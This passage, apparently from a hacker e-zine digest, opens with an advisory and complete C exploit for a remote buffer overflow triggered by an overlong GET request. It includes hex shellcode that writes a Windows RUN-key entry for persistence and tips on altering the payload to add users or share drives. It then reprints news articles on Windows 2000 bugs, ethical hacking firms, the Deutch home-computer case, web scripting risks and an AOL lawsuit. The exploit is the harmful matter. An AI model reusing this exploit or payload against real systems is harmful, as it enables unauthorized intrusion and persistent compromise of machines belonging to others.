not an isolated phenomenon. This advisory is not about that one buffer overflow. In fact, I will wager there are at least 10 discrete buffer overflow conditions in this software package alone, all of them exploitable from remote. There may be even more. The fact that I was able to find such a simple and easy to discover bug (the GET request - exploitable from a WEB Browser URL!) only substantiates that this piece of software was never adequately tested in QA. I wondered to myself - should I report this to the software vendor? They may need time to release a patch. It then occured to me that I would only find another buffer condition after they had released the patch - and once again I would assume the burden of informing them. In effect I realized that what I needed to tell them was that their QA process either sucked, or was non-existant. By telling them about specific buffer overflows I am actually performing QA for them - and they do not pay me to do that. That is not my responsibility. (the epiphany occurs here) It is not the responsibility of myself, or any hacker for that matter, to perform QA for a software vendor. It is only the responsibility of the hacker to expose software which has clearly never been engineered properly. (need I bring up Seattle Labs Sendmail? - a target of embarassing levels of exploit over the past few years - why bother?) If you are responsible for deploying a large project, or you are investing your company into a software solution - I have a single piece of advice: HAVE THE SOFTWARE INDEPENDANTLY TESTED BY A QUALIFIED SOFTWARE LAB! The cost of doing this is far less than the cost of ownership if you invest in poorly engineered software! There are several commercial testing labs that employ some great talent. Software Quality is generally so bad that I don't think insurance companies should touch your enterprise with a 10 foot pole until a software lab has determined low risk. (I step down from the podium) Lets talk about this exploit: The fact that the GET request causes an oveflow is far from noteworthy. I can tell just by the disassembly that there are many more overflows where this came from. (I actually tested several programs today, and all but one had remote buffer overflow bugs - I leave the others for future cannon fodder). What is worth talking about is the payload I designed for this exploit. So, the rest of the discussion is about the payload. One of the most common things a payload does is open a remote shell. A number of months back I wrote a small intrusion prevention tool that rendered all of these overflows harmless - an NT kernel patch that prevents my server software from launching sub-processes. Gee, all of the 'shell' based overflow attacks have been demoted to ankle-biters. Of course, those of you with experience immediately realize that a payload can do anything it wants - and as the virus underground has taught us - there are a million ways to torture a computer. Todays payload does not open a remote shell - rather, it shares all of your hard drives without a password - and does this without launching a single sub-process or even loading any new functions. We are going to attack the NT registry through functions already loaded into the process space. Most processes have useful functions already loaded into address space. Using WDASM and VC++ I was able to find the memory location of the following functions: Name: Jump Table: Actual (NTServer 4.0 SP3) ADVAPI32.RegCloseKey [43D004] 77DB75A9 ADVAPI32.RegCreateKeyExA [43D008] 77DBA7F9 ADVAPI32.RegOpenKeyExA [43D00C] 77DB851A ADVAPI32.RegQueryValueExA [43D010] 77DB8E19 ADVAPI32.RegSetValueExA [43D000] 77DBA979 Since we cannot be assured where the location of ADVAPI32.DLL will be mapped, we simply use the jump table itself, which will be loaded in the same location regardless. In order to prevent NULL characters, I XOR my data area with 0x80. The payload first decodes the data area, then calls the following functions in order to add a value to the windows RUN key: RegOpenKeyEx(); RegSetValueEx(); In order to avoid NULL's I used an XOR between registers, as you see in code: mov eax, 77787748 mov edx, 77777777 xor eax, edx push eax followed later only by: mov eax, 0x77659BAe xor eax, edx push eax These values translate to addresses in the local area which require a NULL character, hence the XOR. The value in the example is merely "cmd.exe /c" with no parameters. You could easily alter this to add a user to the system, or share a drive. For "script kiddie" purposes you will get nothing here - you'll need to alter the cmd.exe string and alter the size variable in the decode loop (shown here set to 0x46): xor ecx, ecx mov ecx, 0x46 LOOP_TOP: dec eax xor [eax], 0x80 dec ecx jnz LOOP_TOP (75 F9) Once this runs, check your registry and you'll find the value in question. The value will be executed upon the next reboot. This is a very common way for network worms to operate, incidentally. The only snag when using an http request is that there are some characters that are filtered or special - so you must avoid these. This limits which machine instructions you can directly inject - however there are always wasy to get around such problems. In conclusion, I merely am trying to demonstrate that there are meny things a buffer overflow can do besides create a shell or download a file - and many forms of host based IDS will not notice this. Now clearly the RUN key is common place for security-savvy people to look, but it could have easily been something else more esoteric. CODE FOLLOWS: #include "windows.h" #include "stdio.h" #include "winsock.h" #define TARGET_PORT 224 #define TARGET_IP "127.0.0.1" char aSendBuffer[] = "GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAABBBBAAAACCCCAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAADDDDAAAAEEEEAAAAAAAAAAA" \ file://mov eax, 0x12ED21FF file://sub al, 0xFF file://rol eax, 0x018 file://mov ebx, eax "\xB8\xFF\x1F\xED\x12\x2C\xFF\xC1\xC0\x18\x8B\xD8" \ // xor ecx, ecx // mov ecx, 0x46 file://LOOP_TOP: // dec eax // xor [eax], 0x80 // dec ecx // jnz LOOP_TOP (75 F9) "\x33\xC9\xB1\x46\x48\x80\x30\x80\x49\x75\xF9" \ file://push ebx "\x53" \ file://mov eax, 77787748 file://mov edx, 77777777 "\xB8\x48\x77\x78\x77" \ "\xBA\x77\x77\x77\x77" \ file://xor eax, edx file://push eax "\x33\xC2\x50" \ file://xor eax, eax file://push eax "\x33\xC0\x50" \ // mov eax, 0x77659BAe // xor eax, edx // push eax "\xB8\xAE\x9B\x65\x77\x33\xC2\x50" file://mov eax, F7777775 file://xor eax, edx file://push eax "\xB8\x75\x77\x77\xF7" \ "\x33\xC2\x50" \ file://mov eax, 7734A77Bh file://xor eax, edx file://call [eax] "\xB8\x7B\xA7\x34\x77" \ "\x33\xC2" \ "\xFF\x10" \ file://mov edi, ebx file://mov eax, 0x77659A63 file://xor eax, edx file://sub ebx, eax file://push ebx file://push eax file://push 1 file://xor ecx, ecx file://push ecx file://push eax file://push [edi] file://mov eax, 0x7734A777 file://xor eax, edx file://call [eax] "\x8B\xFB" \ "\xBA\x77\x77\x77\x77" \ "\xB8\x63\x9A\x65\x77\x33\xC2" \ "\x2B\xD8\x53\x50" \ "\x6A\x01\x33\xC9\x51" \ "\xB8\x70\x9A\x65\x77" \ "\x33\xC2\x50" \ "\xFF\x37\xB8\x77\xA7\x34" \ "\x77\x33\xC2\xFF\x10" \ // halt or jump to somewhere harmless "\xCC" \ "AAAAAAAAAAAAAAA" \ // nop (int 3) 92 // nop (int 3) // jmp "\x90\x90\xEB\x80\xEB\xD9\xF9\x77" \ /* registry key path "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" */ "\xDC\xD3\xCF\xC6\xD4\xD7\xC1\xD2\xC5\xDC\xCD\xE9\xE3\xF2" \ "\xEF\xF3\xEF\xE6\xF4\xDC\xD7\xE9\xEE\xE4\xEF\xF7\xF3\xDC\xC3" \ "\xF5\xF2\xF2\xE5\xEE\xF4\xD6\xE5\xF2\xF3\xE9\xEF\xEE\xDC" \ "\xD2\xF5\xEE\x80" \ /* value name "_UR_HAXORED_" */ "\xDF\xD5\xD2\xDF\xC8\xC1\xD8\xCF\xD2\xC5\xC4\xDF\x80" \ /* the command "cmd.exe /c" */ "\xE3\xED\xE4\xAE\xE5\xF8\xE5\xA0\xAF\xE3\x80\x80\x80\x80\x80"; int main(int argc, char* argv[]) { WSADATA wsaData; SOCKET s; SOCKADDR_IN sockaddr; sockaddr.sin_family = AF_INET; if(3 == argc) { int port = atoi(argv[2]); sockaddr.sin_port = htons(port); } else { sockaddr.sin_port = htons(TARGET_PORT); } if(2 <= argc) { sockaddr.sin_addr.S_un.S_addr = inet_addr(argv[2]); } else { sockaddr.sin_addr.S_un.S_addr = inet_addr(TARGET_IP); } try { WSAStartup(MAKEWORD(2,0), &wsaData); s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(INVALID_SOCKET == s) throw WSAGetLastError(); if(SOCKET_ERROR == connect(s, (SOCKADDR *)&sockaddr, sizeof(SOCKADDR)) ) throw WSAGetLastError(); send(s, aSendBuffer, strlen(aSendBuffer), 0); closesocket(s); WSACleanup(); } catch(int err) { fprintf(stderr, "error %d\n", err); } return 0; } ps. This took all day, I need a scotch... Special Thanks: Barnaby Jack, DilDog, Jeremy Kothe - your skills are Elite, thanks for publishing. @HWA 188.0 Bugfest! Win2000 has 63,000 'defects' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by _ImDeaD_ http://www.zdnet.com/zdnn/stories/news/0,4586,2436920,00.html?chkpt=zdnntop Bugfest! Win2000 has 63,000 'defects' Urging developers to clean up their code, a Microsoft exec says: 'How many of you would spend $500 on a piece of software with over 63,000 potential known defects?' It ships Thursday. By Mary Jo Foley, Sm@rt Reseller UPDATED February 11, 2000 2:25 PM PT Not everyone will be having fun at Microsoft Corp. next week. While the software giant and its partners celebrate the arrival of Windows 2000 on Thursday, Feb. 17, hundreds of members of the Windows development team will be busy cleaning up the mess. Not the launch-party mess. The code mess. According to an internal Microsoft (Nasdaq: MSFT) memo viewed by Sm@rt Reseller, the company needs to fix tens of thousands of bugs contained in the final Win2000 release code. Fixing these bugs is the top-priority assignment for Microsoft group VP Jim Allchin's Windows team. "Our customers do not want us to sell them products with over 63,000 potential known defects. They want these defects corrected," stated one of Microsoft's Windows development leaders, Marc Lucovsky, in the memo. "How many of you would spend $500 on a piece of software with over 63,000 potential known defects?" According to the Microsoft memo, the Windows 2000 source-code base contains: More than 21,000 "postponed" bugs, an indeterminate number of which Microsoft is characterizing as "real problems." Others are requests for new functionality, and others reflect "plain confusion as to how something is supposed to work." More than 27,000 "BugBug" comments. These are usually notes to developers to make something work better or more efficiently. According to Microsoft, they tend to represent "unfinished work" or "long-forgotten problems." Overall, there are more than 65,000 "potential issues" that could emerge as problems, as discovered by Microsoft's Prefix tool. Microsoft is estimating that 28,000 of these are likely to be "real" problems. "Our goal for the next release of Windows 2000 is to have zero bugs. The only way this happens is if you take it upon yourselves to fix the bugs that should be fixed, and close the bugs that should be closed," continued Lucovsky in his note to the development team. He added that no new code for future Windows releases, such as Whistler and Blackcomb, will be allowed to be "checked in" until the development team has fixed the existing Windows 2000 bugs. Microsoft's response A spokeswoman for Microsoft strongly defended Windows 2000's quality. "Bugs are inherent in computer science," she said. "All software ships with issues. The difference is (that) no software in the history of Microsoft development has ever been through the incredible, rigorous internal and external testing that Windows 2000 has been through." The spokeswoman said 750,000 testers received each beta version of Windows 2000. She said "hundreds of companies have signed off on the incredibly high quality and reliability of Windows 2000." The result, she said, is that hundreds of companies are deploying Windows 2000 before general availability. One developer, informed of Microsoft's bug estimates, said all new software ships with lots of bugs but few software vendors are willing to acknowledge this reality. "The fact that Microsoft found that many bugs indicates to me just how thorough their testing processes are," said the Windows developer, who requested anonymity. Waiting for bug fixes But others aren't so sure. Market researchers have repeated warnings to their clients against upgrading immediately to Win2000. Several outfits have advised customers to wait until Microsoft issues its first or second service pack before deploying Win2000. And research outfits made these suggestions before the exact bug tallies came to light. Despite these bugs, Microsoft has made Windows 2000's reliability a key focus and part of its marketing message for months. At Comdex/Fall last year, Allchin detailed the two-year-old reliability initiative upon which Microsoft had embarked to insure Win2000 would be more stable and reliable than NT 4.0 or its predecessors. Allchin said Microsoft spent 500 person-years and $162 million on people and tools specifically to improve reliability of the product. In more recent weeks Microsoft has plastered ads on buses, billboards and telephone booths in a number of major cities. "Windows 2000 is coming. Online or off, a standard in reliability," reads the text. Other hurdles Windows 2000 is hardly Microsoft's only worry in the coming months. Another big hurdle is application support for the OS. Microsoft has been working on a slew of Windows 2000/Active Directory-optimized applications that ultimately will ship as some type of BackOffice 2000 or BackOffice 5.0 package. The first BackOffice 2000 beta isn't expected until some time in the second half of this year, but the first BackOffice 2000 app upgrade, Exchange 2000, is expected to arrive at midyear. Other BackOffice Server updates -- the next releases of SQL Server, Proxy Server, SNA Server and Systems Management Server -- also are in the development pipeline. But exactly how far along they are is unclear. At the same time, Microsoft is developing several BackOffice add-ons. Microsoft preannounced some of these add-ons, such as its BizTalk Server, Commerce Server and AppCenter Server, a full year ago. But first betas of these point products have yet to appear. The company doesn't plan to move any of these new point products into the BackOffice SKU, said Russ Stockdale, director of server applications marketing with Microsoft's Business Productivity Group. Stockdale said Microsoft's plan is to continue to offer current and future BackOffice SKUs to branch-office customers and midsized organizations. Stockdale acknowledged that BackOffice 2000 will have little appeal to e-commerce and dotcom customers -- even though Microsoft is pitching its anchor, Windows 2000, as an e-commerce-optimized operating system. @HWA 189.0 Legit Hackers Roam Cyberspace for Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Slash So you thought hackers were nerds in dark rooms travelling in cyberspace to attack companies' computer systems or steal data. Full Story <http://www.ukhackers.com/0602001.htm> Legit Hackers Roam Cyberspace for Security So you thought hackers were nerds in dark rooms travelling in cyberspace to attack companies' computer systems or steal data. Think again. A new breed of hackers licensed to hack legally into companies around the world, ranging from banks in Israel and Britain to e-commerce companies in Spain, and check their systems' security, is at work in Sweden. The Stockholm-based private company Defcom, set up in April last year, is a pioneer in a shadowy business that may seem more like a scene from one of legendary American science fiction author William Gibson's novels than reality. But Defcom (www.defcom-sec.com) actually gets paid for hiring out its ``ethical hackers'' to large companies, mostly in the banking, insurance and e-commerce sector around Europe. ``Nine out of 10 companies we're employed to check, we can break into through the Internet,'' Defcom chief executive Thomas Gullberg told Reuters. ``That's a frightening statistic.'' Defcom expects its business to grow fast as more companies seek protection from hackers, sophisticated users of advanced computer programming languages who can break into computer systems or Web sites to change or steal information. Consumers handed an estimated $30 billion over to Internet sites last year, a sign that a lot of people have lost their fears about shopping online. Most got what they ordered and didn't have their credit card details abused. Online Boom Threatens Security But the Web is becoming an ever more attractive playground for hackers as e-commerce mushrooms in Europe and the United States, and sensitive data is transferred over the Internet. Security experts say some Web sites are forgetting about security issues in their rush to be on the Internet. One concern is the expected arrival of mobile phones linked to the Web, creating more opportunities for hackers to get in. And some worry that putting too many security features on a site scares away some consumers and slows the transaction process, while costly security features cannot match the returns of investments in marketing and customer acquisition. A survey by Zona Research showed that consumers who have to wait more than eight seconds will click to another site. Hackers can break into practically any computer system if they want to, Defcom said. Defcom is one of hundreds of Net start-ups in Sweden, one of the world's most wired countries. With its high Internet penetration and wide use of e-commerce and Internet banking, Sweden also has some of the world's best online security. ``We aim to be the leader in Europe. I think we are already,'' Gullberg said. ``It's such a new area. We're the only ones who've managed to organize it properly. Some have tried but failed.'' Licensed To Hack It was hard at first to bring hackers together, but Gullberg was surprised by the willingness on the part of hackers to turn legitimate. ``We've brought hacking to another stage, made it ethical,'' Gullberg said. ``We've gathered hackers under one roof. After all they're the best in the business, they know how it's done.'' Defocom's motto, displayed in one of the main hackers' rooms, sums it up: ``It takes one to know one.'' The Swedish company -- with an office in London -- has grown to over 40 staff, of whom about half are professional hackers, aged 23 to 30. One has a criminal record. To boost expertise and knowledge it has also hired a police officer from the IT security division in Sweden's national crimes prevention unit. Once appointed by a company to check their security system staff carry out a technical analysis then travel to the country of the company and start hacking. What makes them different to some other data security firms is that they actually make changes in their customers' computers to see whether they can really be hacked into, Defcom said. ``We don't just go to the firewall and prove that we can break it, but we go into the main computers,'' Defcom's senior cyberspace hacker, who asked to remain anonymous, told Reuters. The company prefers not to name its hackers as this may unleash a backlash from real hackers out there seeking to disturb the legitimate ones. Defcom takes between two hours to three days with most cases fixed once it tells them how to improve the system. ``We deliver the truth to clients. The bitter-sweet truth,'' Gullberg said. Most Business In Finance Sector ``Security has been a big problem in the business world and it still is. The Internet is not safe,'' Gullberg said. Defcom says it is not hard to convince companies of their market expertise, although clients' IT officials get very nervous once they manage to hack into their systems. Most illegal hacking in finance centers on stealing credit card numbers but is expanding quickly into industrial espionage. Defcom said an underground market known as ``information broker'' sites was growing on the Web where clients could scout around for hackers to do their dirty work, like breaking into a company to steal car designs or corporate data. Defcom has several contracts in Israel, especially in Internet banking, and said that despite its reputation as one of the world's high-tech nations its security was often sloppy. It also has contracts in Europe but has not yet moved into the United States, the biggest market for hackers. Defcom, which eventually plans to go public, has some 50 fixed customers -- including Sweden's top listed companies -- who sign three-year contracts for monthly visits from Defcom. ``We work for insurance companies in Britain who want their clients, especially banks, checked to see how safe they are and what insurance premium they should have,'' Gullberg said. The security industry got a boost last month in the form of the Clinton administration's plan to relax rules on the export of sophisticated encryption technology, which enables people to conceal credit card numbers and other data from prying eyes. The need for tighter security was underscored last month when hackers broke into online music retailer CD Universe, a unit of EUniverse Inc. and stole 300,000 credit card numbers, demanding payment of $100,000 not to use them. Defcom advises its clients not to publicize their use of its services as this could be a challenge to the hacking community. ``It's easy to break into the system. Too easy. But often customers don't know when the companies have had intruders because they cover it up,'' the top hacker said. @HWA 190.0 Deutch controversy raises security questions for Internet users ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Slash 'A huge vulnerability' Full Story <http://www.ukhackers.com/0602002.htm> Deutch controversy raises security questions for Internet users From Science Correspondent Ann Kellan Former CIA Director John Deutch's alleged use of a home computer to store classified materials has sparked a security scare in the U.S. intelligence community and has also pointed out a problem many Internet users are not aware of. The minute anyone logs onto the Internet, financial records and other personal information stored on a home computer are an open book to any cyber-thief. Security experts say Deutch would be a much bigger target than the average person. "There are known foreign intelligence agents operating on the Internet today ... and they are actively seeking U.S. intelligence on the Internet," said Daniel Verton of Federal Computer Week. "It's hard to know exactly what he had on his home computer," Verton said. "But we do know that it was thousands of pages in length, we do know it was top secret and probably ranged the entire breadth of classifications, from unclassified to top secret code word information." Most hackers are more interested in larceny than espionage, targeting credit card numbers and bank records. Those records are becoming more vulnerable as the number of people using the Internet grows. 'A huge vulnerability' The modems that most home computers use to connect to the Internet are difficult, but not impossible, for a thief to crack. But some new ways to log on are l ess secure. "We're seeing things like broadband Internet ... faster connections that are always on," said PC World Magazine's Sean Dugan. "That's a huge vulnerability." Computers connected to the Internet through high-speed cable modems are at the highest risk, because they share the line with other people. Danger lurks in 'Trojan Horses' Microsoft Windows even has a setting that lets users share information with those people. This function can be disabled if you don't want others to have access to your computer. Another point of entry is through e-mail attachments, where so-called "Trojan horses" can be hidden. These programs give thieves the ability to control another computer from a remote location, without the user's knowledge. Security software and programs that scramble or encrypt data are available, but experts say the best way for users to protect themselves is to keep private information off-line. @HWA 191.0 PC's Vulnerable to Security Breaches, Experts Say ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Slash Unless a home PC is placed in an isolation tank, computer security experts say, it is vulnerable to a panoply of potential intrusions. full Story <http://www.ukhackers.com/0602003.htm> PC's Vulnerable to Security Breaches, Experts Say Unless a home PC is placed in an isolation tank, computer security experts say, it is vulnerable to a panoply of potential intrusions. For that reason, it can be an extremely hazardous place to keep anything remotely confidential, much less the classified documents that John M. Deutch, the former director of central intelligence, had stored on his unsecured home computers in 1996. "The more software people have on their computers, and the more they are online, the more vulnerable they become to attack," said Avi Rubin, an Internet security expert at AT&T Labs Research in Florham Park, N.J. "All the factors that contribute to increased vulnerability are becoming more and more common." To be sure, general awareness of security vulnerabilities among home PC users was not very high in 1996, when people were beginning to explore the World Wide Web in increasing numbers. Then, as now, the level of vulnerability depended largely on how the computer was used and on what precautions were taken. A computer user's vulnerability to attack does not depend as much on which Web site is visited as on what software is used to gain access to the Internet, experts say. Mr. Deutch's computers had access to the Web via America Online. And, in 1996, America Online accounts were among the most frequent targets of attackers, who used sundry ploys to gain access to members' passwords. This included planting malicious hidden programs known as trojan horses on the victims' hard drives. In recent years, experts have exposed a number of security holes in browsing software. In general, however, e-mail programs are the software most vulnerable to intrusion, said Richard Smith, an Internet security consultant in Cambridge, Mass. That is because a trojan horse attack can come in the form of a malicious program attached to a piece of e-mail or, in some instances, can be carried within the e-mail message itself. In either case, these programs end up on a computer's hard drive, where they can do many kinds of mischief. For example, some have been known to capture passwords by monitoring the victim's keystrokes. This has been a common attack on AOL. "It's possible that you can read files off a hard drive and then send them back on the Web as e-mail to someone else, or post them to a news group," Mr. Smith said. The danger of a trojan horse is that it is a seemingly legitimate program that hides -- and eventually executes -- a malicious code. While many such attacks are mounted randomly, Mr. Smith said that such a method of gaining access to a computer would be ideal for espionage. "These security holes would be a great way for spying," he said. This could be accomplished, he said, by sending an e-mail message containing a clandestine program that lowers the computer's security settings, paving the way for a second, more malicious program. "If you're in the spy business," he said, "what better way to do it than to get the home e-mail addresses of important people and use some of these security holes to bug their computer?" Mr. Smith said he knew of no such incidents involving espionage, but he added that a portion of a fast-spreading virus called Melissa, which infected thousands of computers last year, worked by lowering the security settings on target computers. Mr. Smith said it was only relatively recently that security holes in Internet-based software were systematically documented. Whether Mr. Deutch had anti-virus software installed on his computers has not been made public. Even if he did, Mr. Rubin said, anti-virus software offers protection only against known viruses. "The big problem is a virus that's creative and new and acts in a way unanticipated by the anti-virus writers," he said. "There's no way to defend against a virus like that." Investigators have not revealed the kind of lines with which Mr. Deutch's computers had been connected to the Internet, but it is likely that they had used a dial-up modem. A dial-up connection poses less of a security risk than what is known as a persistent connection -- like a cable modem or digital subscriber line, or DSL -- in which a computer is always online. Persistent connections typically are much higher speed than dial-up connections and have surged in popularity only recently. Mark Seiden, chief network security consultant to the Kroll-O'Gara Information Security Group in Palo Alto, Calif., said a more interesting question was the extent to which Mr. Deutch was sending and receiving sensitive information from the home computer via e-mail. E-mail traveling over the Internet is vulnerable to interception. Unless it is encrypted, its contents are there for the taking. "The last time I talked to someone at the C.I.A. about sending something there, they said to send it by U.S. mail," Mr. Seiden said. "They didn't want me to e-mail them anything." The fact that no computer is an island these days, Mr. Rubin said, has put security experts in something of an "arms race" with potential intruders. "They take a few steps forward, then we take a few steps," he said. In spite of a tremendous effort on the part of security professionals to secure computers, Mr. Rubin said, "I'd say the attackers have the edge." "The best thing people can do in the face of this is not to talk to strangers," La Guardia said. "Don't go into dark alleys. There are bad places out there--and bad people. Stay away from them." In addition to JavaScript, other common scripting languages include AppleScript, CGI, HTMLScript, Perl and VBScript. JavaScript is standardized under the European Computer Manufacturer's Association (ECMA), an international standards body based in Switzerland. @HWA 192.0 Hacking hazards come with Web scripting territory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Slash Heard about a Web security issue lately? Chances are scripting was part of the problem. full Story <http://www.ukhackers.com/0602004.htm> Hacking hazards come with Web scripting territory Heard about a Web security issue lately? Chances are scripting was part of the problem. If you've surfed the Web recently, you've almost certainly seen scripts at work performing some of the most common tasks of today's Web pages, from helping users search pages to scrolling text across the screen and launching new windows. In the wake of a government advisory about a newly recognized Web scripting security threat, software providers fear scripting is getting a bum rap despite security protections built into the top scripting implementations. Web scripting is the method most sites use to create moving parts. Scripting languages such as JavaScript--invented in 1995 by Brendan Eich at Netscape, now a division of America Online--bring to the Web the kind of features that at the dawn of the Web could be found only on the computer desktop, features that let users interact with sites without calling up a new page from the server. The difference between scripting languages, which can be found on and off the Web, and computer programming languages like C++ or Fortran, is that scripting languages are interpreted, while programming languages are compiled. Compilers translate programming instructions written by humans into a language a microchip can understand. With scripts, browsers essentially do that work on the fly. Scripts are powerful enough, however, to do real damage when written maliciously. Both this week's government advisory and countless other exploits demonstrated by bug hunters on the Web have shown how hackers can take advantage of the flexibility and power of scripting to pry into Web surfers' private information, both in the browser and in other applications on the computer. Chief among these bug hunters is the Bulgarian security consultant Georgi Guninski, who has numerous scripting exploits to his name for the major browsers provided by Microsoft and Netscape. In a recent example, Guninski showed how Microsoft's Outlook Express mail reading application let a malicious user embed a script within a message to expose the mail of the targeted user while the initial message window remained open. Guninski earned a steady income of $1,000 per bug from Netscape before the company brought him on board as a consultant last summer. Security experts point out, however, that the government's advisory did not pinpoint any flaw on the scripting side of things, but rather with Web sites' implementation of forms that permitted the introduction of potentially malicious scripting tags. Despite the frequency of scripting-related security problems, Microsoft stresses that the hazards come with the technology territory. "There is always a balance between security and ease of use, and scripting is no exception," a Microsoft spokeswoman said. "It is up to each customer to decide what sites they want to allow to perform scripting and which they don't." She noted that Internet Explorer's security zones let users classify sites according to whether they are known and trusted and therefore allowed to run scripts. Netscape said that scripting is the safer of various alternatives because of its "sandbox" security model, which only allows the script to interact within certain boundaries on the site visitor's computer. Michael La Guardia, group product manager for the Communicator browser, explained that JavaScript is only allowed to interact with the user through the Web interface. "If you have native code talking directly to your computer, it could do anything," he said. "It could set up a listener and get sensitive information like passwords and credit card numbers or erase your hard drive. With JavaScript, the programmer is not allowed to execute native code." He added: "If it were native code running all the time, we wouldn't have the Web as we have it today. It would be one giant gaping security hole." For example, Microsoft's ActiveX technology has been criticized for running code on computers while relying on a "trust" security model, in which ActiveX controls can execute native code provided the user has decided they trust the control's source. Even with sandbox protections, however, Netscape said users should exercise caution in choosing which sites to visit. "The best thing people can do in the face of this is not to talk to strangers," La Guardia said. "Don't go into dark alleys. There are bad places out there--and bad people. Stay away from them." In addition to JavaScript, other common scripting languages include AppleScript, CGI, HTMLScript, Perl and VBScript. JavaScript is standardized under the European Computer Manufacturer's Association (ECMA), an international standards body based in Switzerland. @HWA 193.0 Microsoft battles pair of security bugs ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Slash Microsoft bug exterminators are at work on two security flaws that could expose users' information to the prying eyes of online attackers. Full Story <http://www.ukhackers.com/0602005.htm> Microsoft battles pair of security bugs Microsoft bug exterminators are at work on two security flaws that could expose users' information to the prying eyes of online attackers. Microsoft has acknowledged that bugs in its Java virtual machine for the Internet Explorer browser and its Outlook Express mail reader for IE enable malicious hackers to look at more than they ought to be able to see on targets' computers. Microsoft said it was devising patches for both holes. With Outlook Express, a malicious user can embed a script within a message that will let him or her read the mail of the targeted user while the initial message window remains open. The bug does not affect the standard version of Outlook. "This could potentially let a malicious user read email, but under pretty restricted conditions," a Microsoft representative said. "And it only allows email to be read--not changed or altered." Pending a fix, Microsoft said that concerned users can turn off Active Scripting within IE's Restricted Zone and reconfigure Outlook Express to open email within the restricted zone. The second problem, in Microsoft's Java virtual machine, also permits the improper reading of files on the user's computer. Originally discovered, described and demonstrated by Kensuke Tada, the vulnerability lets a Java applet read, but not write to or delete, "known files," which could include the registry file or other files with common names like "memo.txt" or "password.txt." A Java applet is a small application written in Java such as an online spreadsheet or news ticker. The Java virtual machine translates code written in the cross-platform Java programming language into code that computers can understand. Microsoft said it learned of the problem over the weekend and immediately began working on its patch. The company downplayed the seriousness of the problem, saying the attacker could only access a particular directory that was most often empty. Microsoft also said the problem was simple to patch and that all versions of the JVM would be patched this weekend. @HWA 194.0 Ex-CIA chief surfed Web on home computer with top-secret data ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Slash Former CIA Director John Deutch used a home computer that contained sensitive information to access the Internet, a CIA report concluded, raising fears that secrets stored on the machine could have been stolen. Full Story <http://www.ukhackers.com/0602009.htm> Former CIA Director John Deutch's alleged use of a home computer to store classified materials has sparked a security scare in the U.S. intelligence community and has also pointed out a problem many Internet users are not aware of. The minute anyone logs onto the Internet, financial records and other personal information stored on a home computer are an open book to any cyber-thief. Security experts say Deutch would be a much bigger target than the average person. "There are known foreign intelligence agents operating on the Internet today ... and they are actively seeking U.S. intelligence on the Internet," said Daniel Verton of Federal Computer Week. "It's hard to know exactly what he had on his home computer," Verton said. "But we do know that it was thousands of pages in length, we do know it was top secret and probably ranged the entire breadth of classifications, from unclassified to top secret code word information." Most hackers are more interested in larceny than espionage, targeting credit card numbers and bank records. Those records are becoming more vulnerable as the number of people using the Internet grows. 'A huge vulnerability' The modems that most home computers use to connect to the Internet are difficult, but not impossible, for a thief to crack. But some new ways to log on are less secure. "We're seeing things like broadband Internet ... faster connections that are always on," said PC World Magazine's Sean Dugan. "That's a huge vulnerability." Computers connected to the Internet through high-speed cable modems are at the highest risk, because they share the line with other people. Danger lurks in 'Trojan Horses' Microsoft Windows even has a setting that lets users share information with those people. This function can be disabled if you don't want others to have access to your computer. Another point of entry is through e-mail attachments, where so-called "Trojan horses" can be hidden. These programs give thieves the ability to control another computer from a remote location, without the user's knowledge. Security software and programs that scramble or encrypt data are available, but experts say the best way for users to protect themselves is to keep private information off-line. @HWA 195.0 How Safe Is AOL 5.0? ~~~~~~~~~~~~~~~~~~~~ Contributed by Slash AOL is hit with $8 billion lawsuit over its latest client software. Internet service provider giant America Online took a potentially damaging hit Monday as it was handed a class-action lawsuit demanding at least $8 billion in damages apparently caused by its Internet software AOL 5.0. The lawsuit, filed in the U.S. District Court in Alexandria, Virginia, seeks $1000, or three times the amount of damage (whichever is greater) each for the estimated 8 million people who have already downloaded the faulty software and "have had the operation of their computer altered as a result thereof," according to the filing. AOL officials responded on Wednesday by stating their intent to fight the allegations. "[The allegations] have no basis in fact or law and we intend to vigorously contest them," said Rich D'Amato, an AOL spokesperson. "[Version 5.0] does not prevent members from accessing the Internet through other providers." User Complaints Rise AOL has come under much criticism since releasing the software as users have complained of interference it causes with other computer programs, particularly software of other ISPs. The filing alleges that "as part of its normal operation, Version 5.0 disables, interrupts, alters, or interferes with operations of other software installed on those same computers, including but not limited to disabling any other internet software which provides internet access by non-AOL ISPs that also may be installed on the computer." In particular, the lawsuit claims that "AOL knew of or should have known that it operated in such a manner." "I upgraded to AOL 5.0 and blindly thought everything went fine," said Kenneth Novak, who uses AOL as a backup. "When I tried to dial in to my work location with dial-up networking, I was unable to use the IE [Internet Explorer] 5.0 browser through our firewall." The problem seems to be affecting people from all technological backgrounds as well, perplexing the first-time user and veteran computer and Internet users alike. "I am a computer consultant and I know my way around installing software," said Kevin Wohler, another self-proclaimed AOL 5.0 victim. "I ran into multiple problems, not the least of which was the interference with my normal 